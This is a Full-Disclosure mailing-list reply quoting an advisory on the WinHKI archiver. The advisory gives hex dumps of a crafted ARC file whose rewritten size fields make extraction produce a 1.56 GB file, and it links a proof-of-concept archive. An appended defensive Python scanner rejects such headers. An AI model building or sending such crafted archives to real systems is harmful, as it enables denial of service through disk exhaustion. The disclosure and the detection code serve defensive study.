Re: [Full-Disclosure] WinHKI - ARC File Extraction of 1KB to 1.56GB

From: bipin gautam (visitbipin_at_yahoo.com)
Date: 01/08/05

    Date: Sat, 8 Jan 2005 01:29:30 -0800 (PST)
    To: full-disclosure@lists.netsys.com

    That's obvious, isn't it... say... if you create a few
    GB file with null characters, 0x00, and compress
    it...... that will produce a similar result. Such an
    issue has been known for any file compression utility for ages.

    Any... software will do the same! Try it. And THAT'S
    OBVIOUS!
    --- "Rafel Ivgi, The-Insider" <theinsider@012.net.il>
    wrote:

    > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    >
    > Application: WinHKI
    > Vendors: http://www.webtoolmaster.com
    > Versions: 1.4d
    > Platforms: Windows
    > Bug: ARC File Extraction of 1KB to 1.56GB
    > Exploitation: Local (extract file)
    > Date: 24 Dec 2004
    > Author: Rafel Ivgi, The-Insider
    > E-Mail: the_insider@mail.com
    > Website: http://theinsider.deep-ice.com
    >
    > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    >
    > 1) Introduction
    > 2) Bugs
    > 3) The Code
    >
    > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    >
    > ===============
    > 1) Introduction
    > ===============
    >
    > WinHKI is a file archiver which supports ARC, BH,
    > CAB, HKI, JAR, LHA, TAR and GZ compression.
    >
    > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    >
    > ======
    > 2) Bug
    > ======
    >
    > This is a normal CAB compressed file header
    >
    > 00000000 1A02 3235 312E 4854 4D00 5E5E 5E5E 5E1B  ..251.HTM.^^^^^.
    > 00000010 0000 0078 3139 73B5 121B 0000 003C 7363  ...x19s......<sc
    > 00000020 7269 7074 FB3E 616C 6572 7428 293C 2F73  ript.>alert()</s
    > 00000030 6372 6970 743E 0D0A 1A00                 cript>....
    >
    > By adding a certain amount of chars after the
    > filename header and replacing all nulls (00) with FF
    > (in order to keep our long string from being
    > terminated):
    >
    > 00000000 1A02 3235 312E 4854 4DFF 5E5E 5E5E 5EFF  ..251.HTM.^^^^^.
    > 00000010 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
    > 00000020 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
    > 00000030 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
    > 00000040 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
    > 00000050 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
    > 00000060 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
    > 00000070 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
    > 00000080 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
    > 00000090 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
    > 000000A0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
    > 000000B0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
    > 000000C0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
    > 000000D0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
    > 000000E0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
    > 000000F0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
    > 00000100 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
    > 00000110 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
    > 00000120 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
    > 00000130 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
    > 00000140 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
    > 00000150 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
    > 00000160 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
    > 00000170 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
    > 00000180 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
    > 00000190 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
    > 000001A0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
    > 000001B0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
    > 000001C0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
    > 000001D0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
    > 000001E0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
    > 000001F0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
    > 00000200 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
    > 00000210 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
    > 00000220 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
    > 00000230 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
    > 00000240 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
    > 00000250 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
    > 00000260 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
    > 00000270 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
    > 00000280 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
    > 00000290 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
    > 000002A0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
    > 000002B0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
    > 000002C0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
    > 000002D0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
    > 000002E0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
    > 000002F0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
    > 00000300 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
    > 00000310 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
    > 00000320 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
    > 00000330 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
    > 00000340 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
    > 00000350 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
    > 00000360 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
    > 00000370 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
    > 00000380 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
    > 00000390 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
    > 000003A0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
    > 000003B0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
    > 000003C0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
    > 000003D0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
    > 000003E0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
    > 000003F0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
    > 00000400 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FF1B  ................
    > 00000410 FFFF FF78 3139 73B5 121B FFFF FF3C 7363  ...x19s......<sc
    > 00000420 7269 7074 FB3E 616C 6572 7428 293C 2F73  ript.>alert()</s
    > 00000430 6372 6970 743E 0D0A 1A00                 cript>....
    >
    >
    > HKI will create a 1.56 GIGABYTE file at the
    > selected extract location.
    >
    > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    >
    > ===========
    > 3) The Code
    > ===========
    >
    > An online proof of concept can be found at:
    > http://theinsider.deep-ice.com/hki156gb.ARC
    >
    > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    >
    > ---
    > Rafel Ivgi, The-Insider
    > http://theinsider.deep-ice.com
    >
    > "Scripts and Codes will make me D.O.S, but they
    > will never HACK me."
    >
    > _______________________________________________
    > Full-Disclosure - We believe in it.
    > Charter:
    > http://lists.netsys.com/full-disclosure-charter.html
    >

                    
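The check a defender would want for the behaviour the thread argues about, as an added example that is not from the advisory or from either poster: a Python pre-scan of ARC entry headers that refuses extraction when an entry declares more compressed bytes than the archive actually contains (what the nulls-to-FF rewrite produces) or more output than a budget allows, before any byte reaches the decompressor. The header layout is the standard ARC one; the 58-byte sample is transcribed from the advisory's first dump, while the two bad variants and the 64 MB budget are constructed for this example.

```python
import struct

ARC_MARK = 0x1A
MAX_OUTPUT = 64 * 1024 * 1024  # per-archive extraction budget; an assumed policy value, not from the advisory

# Transcribed from the advisory's first (well-formed) dump: a 58-byte ARC holding one
# stored (method 2) entry "251.HTM" of 27 bytes, followed by the 1A 00 end marker.
GOOD_ARC = bytes.fromhex(
    "1A02 3235 312E 4854 4D00 5E5E 5E5E 5E1B 0000 0078 3139 73B5 121B 0000 003C 7363"
    "7269 7074 FB3E 616C 6572 7428 293C 2F73 6372 6970 743E 0D0A 1A00"
)
# Constructed: the advisory's nulls-to-FF rewrite applied to that sample (without the
# inserted padding), so both size fields now read 0xFFFFFF1B and the NUL terminator is gone.
BAD_ARC = GOOD_ARC.replace(b"\x00", b"\xff")
# Constructed: data and compressed size stay consistent, but the original-size field
# claims 1.56 GB of output from 27 stored bytes.
BOMB_ARC = GOOD_ARC[:25] + (1_560_000_000).to_bytes(4, "little") + GOOD_ARC[29:]


def scan_arc(blob, max_output=MAX_OUTPUT):
    """Walk the entry headers; return (entries, None) if safe, else (entries so far, reason).

    Entry layout: 0x1A, method, 13-byte NUL-padded name, u32 LE compressed size,
    u16 date, u16 time, u16 CRC, then (method > 1) u32 LE original size, then data.
    Only headers are read, so the verdict comes before any decompression happens.
    """
    entries, pos, total = [], 0, 0
    while True:
        if pos + 2 > len(blob) or blob[pos] != ARC_MARK:
            return entries, f"missing ARC marker at offset {pos:#x}"
        method = blob[pos + 1]
        if method == 0:                      # end-of-archive marker
            return entries, None
        hdr_len = 25 if method == 1 else 29  # method 1 carries no separate original size
        if pos + hdr_len > len(blob):
            return entries, f"truncated header at offset {pos:#x}"
        name = blob[pos + 2:pos + 15].split(b"\x00", 1)[0].decode("ascii", "replace")
        csize = struct.unpack_from("<I", blob, pos + 15)[0]
        osize = csize if method == 1 else struct.unpack_from("<I", blob, pos + 25)[0]
        data_start = pos + hdr_len
        # Check 1: the declared compressed length must lie inside the bytes we hold.
        if csize > len(blob) - data_start:
            return entries, f"{name!r}: claims {csize} bytes, {len(blob) - data_start} remain"
        # Check 2: cumulative declared output must stay under the extraction budget.
        total += osize
        if total > max_output:
            return entries, f"{name!r}: declared output {total} exceeds budget {max_output}"
        entries.append((name, csize, osize))
        pos = data_start + csize


if __name__ == "__main__":
    for label, arc in ("good", GOOD_ARC), ("nulls->FF", BAD_ARC), ("1.56GB", BOMB_ARC):
        print(label, scan_arc(arc))
```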

